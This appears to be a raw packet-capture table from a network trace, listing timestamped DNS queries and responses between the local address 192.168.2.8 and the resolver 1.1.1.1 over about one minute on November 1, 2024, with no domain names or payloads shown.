                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.002926111 CET53506001.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.850527048 CET6349553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.857687950 CET53634951.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:58.325527906 CET6491053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:58.333060980 CET53649101.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.048506021 CET5912853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.056732893 CET53591281.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.251434088 CET4982453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.435003996 CET53498241.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.053553104 CET5018153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.061053038 CET53501811.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.970058918 CET5765253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.977813005 CET53576521.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.980676889 CET6323753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.220237970 CET53632371.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.915971041 CET6415253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.922668934 CET53641521.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.717932940 CET5957053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.724911928 CET53595701.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.870739937 CET6170153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.878860950 CET53617011.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.931720018 CET5795353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.933089018 CET6312853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.938910007 CET53579531.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.940131903 CET53631281.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.780493021 CET5967653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.787480116 CET53596761.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.539175987 CET5234753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.546628952 CET53523471.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.644606113 CET5958553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.651745081 CET53595851.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.521153927 CET6520953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.528116941 CET53652091.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.066654921 CET5257753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.163049936 CET53525771.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.335480928 CET5751653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.343043089 CET53575161.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.510158062 CET5875253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.517411947 CET53587521.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.166958094 CET5896453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.174134016 CET53589641.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.261859894 CET5713053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.269578934 CET53571301.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.974544048 CET5358653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.982058048 CET53535861.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.171642065 CET6047853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.178637981 CET53604781.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:11.876559019 CET5644753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:11.884512901 CET53564471.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.587219954 CET5190853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.594815969 CET53519081.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.596143007 CET6225853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.603766918 CET53622581.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.755439997 CET5993853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.763186932 CET53599381.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.553889990 CET5214353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.745704889 CET53521431.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.942816019 CET5611253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.949990988 CET53561121.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.520258904 CET5432253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.527496099 CET53543221.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.208398104 CET5421453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.215928078 CET53542141.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.763222933 CET6291653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.770576954 CET53629161.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.838488102 CET5281253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.846013069 CET53528121.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:18.027750015 CET5251153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:18.035068035 CET53525111.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:18.312442064 CET5214153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:18.320338964 CET53521411.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:19.179259062 CET4989453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:19.186481953 CET53498941.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:19.943233967 CET6355853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:19.952234983 CET53635581.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.446259975 CET5930853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.454413891 CET53593081.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.403558016 CET5998653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.411300898 CET53599861.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.459177971 CET5114553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.466083050 CET53511451.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.353635073 CET4951953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.363343954 CET53495191.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.943114996 CET5599453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:23.132112026 CET53559941.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:23.991374016 CET5704953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:23.999073029 CET53570491.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.072154999 CET6032153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.079984903 CET53603211.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.692435026 CET6025253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.699776888 CET53602521.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.916155100 CET5574453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.923546076 CET53557441.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:25.580729008 CET5280653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:25.588027954 CET53528061.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:25.729126930 CET6040053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:25.736718893 CET53604001.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:26.589586020 CET6371453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:26.596513987 CET53637141.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.397078037 CET6339853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.404200077 CET53633981.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.404727936 CET4921253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.411453009 CET53492121.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.972453117 CET5870153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.979592085 CET53587011.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.422909021 CET6318653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.430248022 CET53631861.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.229377985 CET5645253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.237128973 CET53564521.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.469060898 CET6313853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.655685902 CET53631381.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.540858030 CET5123853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.548228979 CET53512381.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.179589033 CET6124553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.187403917 CET53612451.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.600838900 CET6138153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.609018087 CET53613811.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.777584076 CET4927953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.785809040 CET53492791.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.325391054 CET6430253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.338011026 CET53643021.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.338583946 CET5243053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.345720053 CET53524301.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.041321039 CET5748353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.228034973 CET53574831.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.822761059 CET5529253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.830248117 CET53552921.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:35.840404034 CET4937253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:35.848195076 CET53493721.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:36.303960085 CET5823553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:36.311336994 CET53582351.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.973665953 CET5800053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.974128008 CET5991953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.981630087 CET53599191.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.981801987 CET53580001.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.008445024 CET6059953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.015953064 CET53605991.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.472347975 CET5838053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.481019974 CET53583801.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.900262117 CET6381953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.907574892 CET53638191.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.214235067 CET6511753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.222064018 CET53651171.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.070918083 CET6103353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.078264952 CET53610331.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.106878042 CET5096353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.114361048 CET53509631.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.852778912 CET5956953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.860805035 CET53595691.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.280549049 CET5605253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.291096926 CET53560521.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.832566977 CET5498753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.839477062 CET53549871.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.329751015 CET5375353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.338025093 CET53537531.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.880384922 CET5839053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:43.887512922 CET53583901.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.020618916 CET5469953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.207427979 CET53546991.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.369285107 CET5367553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:45.376961946 CET53536751.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.327465057 CET5763753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.334614038 CET53576371.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.394644976 CET5935753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:46.402151108 CET53593571.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.923381090 CET5369753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:47.931332111 CET53536971.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.002506971 CET6542653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.011516094 CET53654261.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.703593969 CET6412753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.710722923 CET53641271.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.942580938 CET4940653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.950289011 CET53494061.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.954154015 CET4936253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:48.961292028 CET53493621.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.176022053 CET5444653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.358434916 CET53544461.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.559618950 CET5508353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.566911936 CET53550831.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:51.811927080 CET5515353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:51.819550037 CET53551531.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:51.927412987 CET5425553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.111799002 CET53542551.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.970680952 CET6349753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.978058100 CET53634971.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:53.654959917 CET5823353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:53.662432909 CET53582331.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.347172976 CET5883353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.354219913 CET53588331.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.512101889 CET5689253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.519217014 CET53568921.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:55.200558901 CET6071753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:55.208046913 CET53607171.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.009069920 CET5102753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.016091108 CET53510271.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.183192968 CET4917753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.190676928 CET53491771.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.906220913 CET6322653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.913369894 CET53632261.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.032150984 CET4970253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.039856911 CET53497021.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.890295982 CET5717553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.897775888 CET53571751.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.924076080 CET4979353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.930977106 CET53497931.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.740824938 CET6186953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.748326063 CET53618691.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.845432043 CET5461153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.852551937 CET53546111.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.457041979 CET6509853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.464489937 CET53650981.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.968569040 CET6327653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.142920971 CET6002253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.150250912 CET53600221.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.151076078 CET5979953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.154396057 CET53632761.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.158426046 CET53597991.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.435276031 CET5799353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.442310095 CET53579931.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.731465101 CET5408253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.738931894 CET53540821.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.421771049 CET5873353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:02.429670095 CET53587331.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.186521053 CET6134853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.194180012 CET53613481.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.891637087 CET4959053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:03.899344921 CET53495901.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.581923008 CET6198953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.589617968 CET53619891.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:04.826814890 CET5980553192.168.2.81.1.1.1
